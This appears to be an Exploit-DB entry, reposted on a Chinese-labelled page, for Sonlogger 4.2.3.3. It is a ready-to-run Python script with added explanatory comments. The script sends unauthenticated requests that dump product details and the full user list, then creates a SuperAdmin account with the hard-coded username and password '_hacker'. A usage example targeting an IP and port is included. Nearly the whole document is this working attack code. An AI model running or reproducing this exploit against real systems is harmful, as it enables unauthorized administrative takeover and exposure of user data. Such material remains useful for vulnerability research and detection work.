Sonlogger 4.2.3.3 – SuperAdmin Account Creation / Information Disclosure

  • 作者: Berkan Er
    日期: 2021-03-15
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/49650/
  • # Exploit Title: Sonlogger 4.2.3.3 - SuperAdmin Account Creation / Information Disclosure
    # Date: 04-02-2021
    # Exploit Author: Berkan Er
    # Vendor Homepage: https://www.sonlogger.com/
    # Version: 4.2.3.3
    # Tested on: Windows 10 Enterprise x64 Version 1803
    # A remote attacker can create a user with the SuperAdmin profile
    
    #!/usr/bin/python3
    
    import argparse
    import string
    import sys
    from random import random
    
    import requests
    import json
    
    # Banner printed by main() before any request is sent.
    banner = '''
    Sonlogger Log and Report System - v4.2.3.3
    Remote SuperAdmin Account Creation Vulnerability / Information Disclosure
    
    Berkan Er <b3rsec@protonmail.com>
    @erberkan
    '''

    # Headers attached to every POST in this script. Nothing here (and nothing
    # elsewhere in the script) carries a session cookie or credential, so the
    # three endpoints used below (/shared/GetProductInfo, /User/getUsers,
    # /User/saveUser) are all exercised unauthenticated.
    commonHeaders = {
        'Content-type': 'application/json',
        'Accept': 'application/json, text/javascript, */*; q=0.01',
        'X-Requested-With': 'XMLHttpRequest'
    }
    
    
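    def get_random_string():
        """Return an 8-character random lowercase ASCII string (and print it).

        The module-level import is ``from random import random``, which binds the
        *function* ``random``, so ``random.choices`` raised AttributeError; the
        ``choices`` function is bound locally here instead. Nothing else in the
        script calls this helper.

        Returns:
            A ``str`` of exactly 8 characters drawn from ``string.ascii_lowercase``.
        """
        from random import choices  # local import: the global name ``random`` is the function

        res = ''.join(choices(string.ascii_lowercase, k=8))
        print(res)  # kept: the original echoed the value to stdout
        return res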
    
    
    def getProductInfo(host, port, flag):
        """Fetch product info and the user list; report whether the version matches.

        Args:
            host: Sonlogger host name or IP, as a string.
            port: port number as a string (it is concatenated into the URL; an int
                would raise TypeError).
            flag: when truthy, also dump the full product-info and user JSON to stdout.

        Returns:
            True if the server's reported ``Version`` is exactly ``'4.2.3.3'``,
            otherwise False. The version string is the only "vulnerable" test made.

        Raises:
            Whatever ``requests.post`` raises on a connection failure, the decode
            error from ``response.json()`` on a non-JSON body, and KeyError when
            ``Version`` is absent; all of these are swallowed by the bare ``except``
            in main(), which then prints the usage text.
        """
        # No credentials or session are attached (see commonHeaders).
        response = requests.post('http://' + host + ':' + port + '/shared/GetProductInfo',
                                 data={},
                                 headers=commonHeaders)

        print("[*] Status code: ", response.status_code)
        # response.json() is decoded again on each call; it is called three times here.
        print("[*] Product Version: ", response.json()['Version'])
        info_json = json.dumps(response.json(), indent=2)

        # The user list is requested even when flag is False and it will not be printed.
        # Presumably the information-disclosure half of the advisory: the full user list
        # is read with no session. An unauthenticated POST to this path is the request
        # a defender would want to alert on.
        response_1 = requests.post('http://' + host + ':' + port + '/User/getUsers', data={}, headers=commonHeaders)
        user_json = json.dumps(response_1.json(), indent=2)

        if flag:
            print("\n*** Product Infos=\n" + info_json)
            print("\n*** Users=\n" + user_json)

        if response.json()['Version'] == '4.2.3.3':
            print("[+] It seems vulnerable !")
            return True
        else:
            print("[!] It doesn't vulnerable !")
            return False
    
    
    def createSuperAdmin(host, port):
        """POST a fixed user record carrying the superadmin profile, then re-list users.

        Args:
            host: Sonlogger host name or IP, as a string.
            port: port number as a string (concatenated into the URL).

        The body is the ``payload`` text sent verbatim (``data=payload``, not
        ``json=``) under a JSON content type. The literal uses single quotes, so it
        is not strict JSON; how the server parses it is not shown by this script.
        The username and password are hard-coded, and nothing inspects
        ``response.status_code`` before the "created" message is printed, so the
        message does not prove the account exists. Returns None.
        """
        payload = '''{
    '_profilename':'superadmin_profile', 
    '_username':'_hacker', 
    '_password':'_hacker', 
    '_fullname':'', '_email':''
    }'''

        # Unauthenticated request; see commonHeaders.
        response = requests.post('http://' + host + ':' + port + '/User/saveUser', data=payload, headers=commonHeaders)
        print("[*] STAUTS CODE:", response.status_code)
        # Printed unconditionally -- success is not verified here.
        print("[!] User has been created ! \nUsername: _hacker\nPassword: _hacker")

        # Re-read the user list so the result can be checked by eye in the output.
        response_1 = requests.post('http://' + host + ':' + port + '/User/getUsers', data={}, headers=commonHeaders)
        json_formatted_str = json.dumps(response_1.json(), indent=2)
        print("\n*** Users=\n" + json_formatted_str)
    
    
    def main():
        """Entry point: read ``host port action`` from sys.argv and dispatch.

        ``action == 'TRUE'`` runs the version check and, only if it returns True,
        createSuperAdmin(); any other value (including 'FALSE' or 'true') takes the
        info-only branch. ``argparse`` is imported at module level but unused --
        arguments are read positionally.
        """
        print(banner)

        try:
            host = sys.argv[1]
            port = sys.argv[2]
            action = sys.argv[3]

            if action == 'TRUE':
                if getProductInfo(host, port, False):
                    createSuperAdmin(host, port)
            else:
                getProductInfo(host, port, True)

            print("KTHNXBYE!")

        # NOTE(review): this bare except is evidently meant for a missing argv entry
        # (IndexError), but it also swallows connection errors, non-JSON responses and
        # KeyError from the calls above, printing the usage text for every failure;
        # `except IndexError:` would be the narrower guard.
        except:
            print("Usage:\npython3 sonlogger-superadmin_create.py < IP > < PORT > < CREATE USER {TRUE / FALSE} >\n\nIP:\tIP "
                  "Address of Sonlogger host\nPORT:\tPort number of Sonlogger host\nTRUE:\tCreate User\nFALSE:\tShow Product "
                  "Infos")
            print("\nExample: python3 sonlogger-superadmin_create.py 192.168.1.10 5000 TRUE\n")
    
    
    # Script entry point; main() reads sys.argv directly.
    if __name__ == "__main__":
        main()